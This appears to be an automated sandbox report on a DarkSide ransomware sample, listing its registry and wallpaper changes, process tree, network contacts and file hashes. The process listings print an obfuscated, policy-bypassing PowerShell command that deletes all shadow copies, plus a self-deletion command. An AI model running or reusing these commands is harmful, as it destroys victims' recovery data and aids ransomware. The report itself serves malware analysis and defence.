Analysis Overview
SHA256
1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb
Threat Level: Known bad
The file 1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb was found to be: Known bad.
Malicious Activity Summary
DarkSide
Modifies extensions of user files
Deletes itself
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies Control Panel
Suspicious behavior: EnumeratesProcesses
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-05-17 12:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-05-17 12:21
Reported
2021-05-17 12:24
Platform
win7v20210408
Max time kernel
66s
Max time network
111s
Command Line
Signatures
DarkSide
Modifies extensions of user files
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f2cbf9aa.BMP" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f2cbf9aa.BMP" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Enumerates physical storage devices
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f2cbf9aa.ico" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.f2cbf9aa | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.f2cbf9aa\ = "f2cbf9aa" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe
"C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\1CC7C1~1.EXE >> NUL
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | securebestapp20.com | udp |
| N/A | 8.8.8.8:53 | 1.0.7.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | securebestapp20.com | udp |
Files
memory/1988-59-0x0000000075AD1000-0x0000000075AD3000-memory.dmp
memory/980-60-0x0000000000000000-mapping.dmp
memory/980-61-0x000007FEFB761000-0x000007FEFB763000-memory.dmp
memory/980-62-0x0000000002640000-0x0000000002641000-memory.dmp
memory/980-63-0x000000001AB70000-0x000000001AB71000-memory.dmp
memory/980-64-0x0000000002680000-0x0000000002681000-memory.dmp
memory/980-65-0x00000000023E0000-0x00000000023E1000-memory.dmp
memory/980-66-0x0000000002360000-0x0000000002362000-memory.dmp
memory/980-67-0x0000000002364000-0x0000000002366000-memory.dmp
memory/980-68-0x000000001C660000-0x000000001C661000-memory.dmp
memory/980-69-0x000000001B5E0000-0x000000001B5E1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | d0353d314c5bc8c1ea82212d0215fa51 |
| SHA1 | 6df2b40f6092434fdf2a54fe34a4ec110e12a6c1 |
| SHA256 | a6c8a1c4d18e494c5f4b9dbf4d07ea122a691566d7e0ff04cf8a63e2db4fa916 |
| SHA512 | 27c8fa70682cfbf60895bd5914a2476fee2794212914b893124012514935944022221cae64d118869969f393d277103f6ef1fa41ed009dea590c8eb9318ef923 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 964e4d4e28734b6461fd42c2774c2c62 |
| SHA1 | 1c981ea3ce8a1b76f82cfcfc7578977639c26bb5 |
| SHA256 | 8acb6f1a2c83eb22bf9cf2b139ba7ad35b2aa7e95268e7395596d98b44f14171 |
| SHA512 | 191ee02a54d90e9d4834f19a91ee5190aea32d04f21880c5767658c8faa1a5b5b12b8c585a86759a50a7178844fb15e4ac88ed9b01561667b155272d7fc82252 |
memory/2736-72-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2021-05-17 12:21
Reported
2021-05-17 12:23
Platform
win10v20210410
Max time kernel
69s
Max time network
125s
Command Line
Signatures
DarkSide
Modifies extensions of user files
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\7b336f65.BMP" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\7b336f65.BMP" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Enumerates physical storage devices
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65 | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\7b336f65.ico" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.7b336f65 | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.7b336f65\ = "7b336f65" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3984 wrote to memory of 2104 | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3984 wrote to memory of 2104 | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3984 wrote to memory of 4700 | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3984 wrote to memory of 4700 | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3984 wrote to memory of 4700 | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe
"C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\1CC7C1~1.EXE >> NUL
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | securebestapp20.com | udp |
| N/A | 185.105.109.19:443 | securebestapp20.com | tcp |
| N/A | 8.8.8.8:53 | 12.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 11.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 1.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 13.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 15.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 19.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 22.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 21.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 26.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 25.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 28.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 32.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 31.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 35.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.15:5355 | udp | |
| N/A | 10.10.0.28:5355 | udp | |
| N/A | 10.10.0.12:5355 | udp | |
| N/A | 10.10.0.26:5355 | udp | |
| N/A | 8.8.8.8:53 | 37.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.31:5355 | udp | |
| N/A | 10.10.0.21:5355 | udp | |
| N/A | 10.10.0.22:5355 | udp | |
| N/A | 8.8.8.8:53 | 38.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.37:5355 | udp | |
| N/A | 8.8.8.8:53 | 39.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 41.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 16.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.19:5355 | udp | |
| N/A | 10.10.0.32:5355 | udp | |
| N/A | 10.10.0.16:5355 | udp | |
| N/A | 10.10.0.39:5355 | udp | |
| N/A | 10.10.0.11:5355 | udp | |
| N/A | 10.10.0.13:5355 | udp | |
| N/A | 10.10.0.38:5355 | udp | |
| N/A | 10.10.0.35:5355 | udp | |
| N/A | 10.10.0.41:5355 | udp | |
| N/A | 8.8.8.8:53 | 18.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 17.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.18:5355 | udp | |
| N/A | 10.10.0.17:5355 | udp | |
| N/A | 185.105.109.19:443 | securebestapp20.com | tcp |
| N/A | 162.159.134.233:443 | tcp | |
| N/A | 104.21.62.88:443 | tcp | |
| N/A | 104.21.8.36:80 | tcp |
Files
memory/2104-114-0x0000000000000000-mapping.dmp
memory/2104-119-0x00000250A8A70000-0x00000250A8A71000-memory.dmp
memory/2104-123-0x00000250A96D0000-0x00000250A96D1000-memory.dmp
memory/2104-126-0x00000250A8AA0000-0x00000250A8AA2000-memory.dmp
memory/2104-128-0x00000250A8AA3000-0x00000250A8AA5000-memory.dmp
memory/2104-130-0x00000250A8AA6000-0x00000250A8AA8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ea6243fdb2bfcca2211884b0a21a0afc |
| SHA1 | 2eee5232ca6acc33c3e7de03900e890f4adf0f2f |
| SHA256 | 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8 |
| SHA512 | 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 32937604dd0791bffd969385d5817eaf |
| SHA1 | 32692f2d388e497edea6b17ef6471afcd7a9e1a8 |
| SHA256 | 292ee5fee35eadf7a2fa9ed81e3e34540a7d58c733e0063af5106749f67c76cd |
| SHA512 | 948e1c29929d526157f3a71d345ddec16d94b6245924198a184f866d61f9af93d314903ad1cdca5277a060118e52eee630c99f8a8f501f2c03699ecea780214f |
memory/4700-142-0x0000000000000000-mapping.dmp